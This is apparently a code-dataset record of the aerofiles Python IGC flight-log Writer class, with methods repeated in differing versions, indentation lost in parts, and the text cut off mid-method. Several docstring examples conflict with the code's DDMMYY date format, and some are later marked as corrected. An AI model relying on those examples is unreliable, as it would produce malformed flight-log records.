:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
              pressure_alt=None, gps_alt=None, extensions=None):
    """
    Write a fix (``B``) record::

        writer.write_fix(
            datetime.time(12, 34, 56),
            latitude=51.40375,
            longitude=6.41275,
            valid=True,
            pressure_alt=1234,
            gps_alt=1432,
        )
        # -> B1234565124225N00624765EA0123401432

    :param time: UTC time of the fix record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param latitude: latitude of the last GPS fix
    :param longitude: longitude of the last GPS fix
    :param valid: ``True`` if the current GPS fix is 3D
    :param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
        sea level datum
    :param gps_alt: altitude above the WGS84 ellipsoid
    :param extensions: a list of extension values according to previous
        declaration through
        :meth:`~aerofiles.igc.Writer.write_fix_extensions`
    """
    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)
    # Missing coordinates fall back to the all-zero placeholders.
    record += self.format_latitude(latitude)
    record += self.format_longitude(longitude)
    # 'A' marks a valid 3D fix, 'V' marks 2D/invalid data.
    record += 'A' if valid else 'V'
    record += '%05d' % (pressure_alt or 0)
    record += '%05d' % (gps_alt or 0)

    if self.fix_extensions or extensions:
        # Extension values must match the earlier I-record declaration,
        # both in count and in declared field width.
        if not (isinstance(extensions, list) and
                isinstance(self.fix_extensions, list)):
            raise ValueError('Invalid extensions list')

        if len(extensions) != len(self.fix_extensions):
            raise ValueError(
                'Number of extensions does not match declaration')

        for type_length, value in zip(self.fix_extensions, extensions):
            length = type_length[1]

            # Numeric values are zero-padded to the declared field width.
            if isinstance(value, (int, float)):
                value = ('%0' + str(length) + 'd') % value

            if len(value) != length:
                raise ValueError('Extension value has wrong length')

            record += value

    self.write_record('B', record)
def write_event(self, *args):
    """
    Write an event (``E``) record::

        writer.write_event(datetime.time(12, 34, 56), 'PEV')
        # -> E123456PEV

        writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
        # -> E123456PEVSome Text

        writer.write_event('PEV')  # uses utcnow()
        # -> E121503PEV

    :param time: UTC time of the event record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param code: event type as three-letter-code
    :param text: additional text describing the event (optional)
    :raises ValueError: on a wrong argument count or an invalid event code
    """
    num_args = len(args)
    if not (1 <= num_args <= 3):
        raise ValueError('Invalid number of parameters received')

    if num_args == 3:
        time, code, text = args
    elif num_args == 1:
        code = args[0]
        time = text = None
    # Two arguments are ambiguous: (time, code) vs. (code, text).
    # The type of the first argument decides which shape was passed.
    elif isinstance(args[0], (datetime.time, datetime.datetime)):
        time, code = args
        text = None
    else:
        code, text = args
        time = None

    if time is None:
        time = datetime.datetime.utcnow()

    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid event code')

    record = self.format_time(time)
    record += code
    if text:
        record += text

    self.write_record('E', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
    """
    Write a comment (``L``) record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the comment
        (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    :raises ValueError: if *code* is not a valid three-letter-code
    """
    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid source')

    record = code + text
    self.write_record('L', record)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_k_record | python | def write_k_record(self, *args):
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record) | Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions` | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L808-L862 | [
"def format_time(self, time):\n if isinstance(time, datetime.datetime):\n time = time.time()\n\n if isinstance(time, datetime.time):\n time = time.strftime('%H%M%S')\n\n if not patterns.TIME.match(time):\n raise ValueError(\"Invalid time: \" + time)\n\n return time\n",
"def write_... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
    """Emit the ``HFPRSPRESSALTSENSOR`` header record.

    :param pressure_sensor: the pressure sensor information
    """
    self.write_fr_header('PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
    """Emit the optional ``HFCIDCOMPETITIONID`` header record.

    :param competition_id: competition id of the glider
    """
    self.write_fr_header('CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
    """Emit the optional ``HFCCLCOMPETITIONCLASS`` header record.

    :param competition_class: competition class of the glider
    """
    self.write_fr_header('CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
    """Emit the optional ``HFCLBCLUB`` header record.

    :param club: club or organisation for which this flight should be
        scored
    """
    self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
    """
    Write all the necessary headers in the correct order::

        writer.write_headers({
            'manufacturer_code': 'XCS',
            'logger_id': 'TBX',
            'date': datetime.date(1987, 2, 24),
            'fix_accuracy': 50,
            'pilot': 'Tobias Bieniek',
            'copilot': 'John Doe',
            'glider_type': 'Duo Discus',
            'glider_id': 'D-KKHH',
            'firmware_version': '2.2',
            'hardware_version': '2',
            'logger_type': 'LXNAVIGATION,LX8000F',
            'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
            'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
            'competition_id': '2H',
            'competition_class': 'Doubleseater',
        })

        # -> AXCSTBX
        # -> HFDTE240287
        # -> HFFXA050
        # -> HFPLTPILOTINCHARGE:Tobias Bieniek
        # -> HFCM2CREW2:John Doe
        # -> HFGTYGLIDERTYPE:Duo Discus
        # -> HFGIDGLIDERID:D-KKHH
        # -> HFDTM100GPSDATUM:WGS-1984
        # -> HFRFWFIRMWAREVERSION:2.2
        # -> HFRHWHARDWAREVERSION:2
        # -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
        # -> HFGPSuBLOX LEA-4S-2,16,max9000m
        # -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
        # -> HFCIDCOMPETITIONID:2H
        # -> HFCCLCOMPETITIONCLASS:Doubleseater

    (The date example above was corrected: ``format_date`` emits the
    ``DDMMYY`` form, so 1987-02-24 becomes ``HFDTE240287``, not
    ``HFDTE870224`` as previously documented.)

    This method will throw a :class:`ValueError` if a mandatory header is
    missing and will fill others up with empty strings if no value was
    given. The optional headers are only written if they are part of the
    specified :class:`dict`.

    .. admonition:: Note

        The use of this method is encouraged compared to calling all the
        other header-writing methods manually!

    :param headers: a :class:`dict` of all the headers that should be
        written.
    """
    # Fail fast before emitting anything if a mandatory header is absent.
    for header in self.REQUIRED_HEADERS:
        if header not in headers:
            raise ValueError('%s header missing' % header)

    self.write_logger_id(
        headers['manufacturer_code'],
        headers['logger_id'],
        extension=headers.get('logger_id_extension')
    )

    self.write_date(headers['date'])
    # Missing optional values fall back to their defaults ('' or None).
    self.write_fix_accuracy(headers.get('fix_accuracy'))

    self.write_pilot(headers.get('pilot', ''))
    if 'copilot' in headers:
        self.write_copilot(headers['copilot'])

    self.write_glider_type(headers.get('glider_type', ''))
    self.write_glider_id(headers.get('glider_id', ''))

    self.write_gps_datum(
        code=headers.get('gps_datum_code'),
        gps_datum=headers.get('gps_datum'),
    )

    self.write_firmware_version(headers.get('firmware_version', ''))
    self.write_hardware_version(headers.get('hardware_version', ''))
    self.write_logger_type(headers['logger_type'])
    self.write_gps_receiver(headers['gps_receiver'])
    self.write_pressure_sensor(headers.get('pressure_sensor', ''))

    # Purely optional headers: only emitted when present.
    if 'competition_id' in headers:
        self.write_competition_id(headers['competition_id'])
    if 'competition_class' in headers:
        self.write_competition_class(headers['competition_class'])
    if 'club' in headers:
        self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
    """Emit one extension declaration record (``I`` or ``J``).

    The record starts with a two-digit extension count followed by one
    ``SSEEXXX`` group per extension (start byte, end byte, code).

    :param type: record type letter (``I`` or ``J``)
    :param start_byte: byte offset of the first extension value
    :param extensions: a list of ``(extension, length)`` tuples
    """
    count = len(extensions)
    if count >= 100:
        # Only two digits are available for the count field.
        raise ValueError('Too many extensions')

    parts = ['%02d' % count]
    offset = start_byte
    for code, size in extensions:
        if not patterns.EXTENSION_CODE.match(code):
            raise ValueError('Invalid extension: %s' % code)
        parts.append('%02d%02d%s' % (offset, offset + size - 1, code))
        offset += size

    self.write_record(type, ''.join(parts))
def write_fix_extensions(self, extensions):
    """Declare the extra columns appended to every B (fix) record::

        writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
        # -> I033638FXA3940SIU4143ENL

    The declaration is remembered so that :meth:`write_fix` can validate
    the extension values passed to it later on.

    :param extensions: a list of ``(extension, length)`` tuples
    """
    self.fix_extensions = extensions
    # The fixed part of a B record occupies bytes 1-35, so extension
    # data starts at byte 36.
    self.write_extensions('I', start_byte=36, extensions=extensions)
def write_k_record_extensions(self, extensions):
    """Declare the columns of subsequent K records::

        writer.write_k_record_extensions([('HDT', 5)])
        # -> J010812HDT

    Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
    associated records.

    :param extensions: a list of ``(extension, length)`` tuples
    """
    self.k_record_extensions = extensions
    # K record extension data starts at byte offset 8.
    self.write_extensions('J', start_byte=8, extensions=extensions)
def write_task_metadata(
        self, declaration_datetime=None, flight_date=None,
        task_number=None, turnpoints=None, text=None):
    """
    Write the task declaration metadata record::

        writer.write_task_metadata(
            datetime.datetime(2014, 4, 13, 12, 53, 2),
            task_number=42,
            turnpoints=3,
        )
        # -> C130414125302000000004203

    (Two fixes to the example above: the trailing ``02`` seconds literal
    is a ``SyntaxError`` on Python 3, and ``format_date`` emits the
    ``DDMMYY`` form, so the record starts with ``130414``, not
    ``140413`` as previously documented.)

    There are sensible defaults in place for all parameters except for
    the ``turnpoints`` parameter. If you don't pass that parameter the
    method will raise a :class:`ValueError`. The other parameter
    defaults are mentioned in the list below.

    :param declaration_datetime: a :class:`datetime.datetime` instance of
        the UTC date and time at the time of declaration (default:
        current date and time)
    :param flight_date: a :class:`datetime.date` instance of the intended
        date of the flight (default: ``000000``, which means "use
        declaration date")
    :param task_number: task number for the flight date or an
        integer-based identifier (default: ``0001``)
    :param turnpoints: the number of turnpoints in the task (not counting
        start and finish points!)
    :param text: optional text to append to the metadata record
    """
    # Declaration timestamp: default to "now"; accept either a datetime
    # or an already-formatted DDMMYYHHMMSS string.
    if declaration_datetime is None:
        declaration_datetime = datetime.datetime.utcnow()

    if isinstance(declaration_datetime, datetime.datetime):
        declaration_datetime = (
            self.format_date(declaration_datetime) +
            self.format_time(declaration_datetime)
        )
    elif not patterns.DATETIME.match(declaration_datetime):
        raise ValueError('Invalid declaration datetime: %s' %
                         declaration_datetime)

    # '000000' is the spec's marker for "same as declaration date".
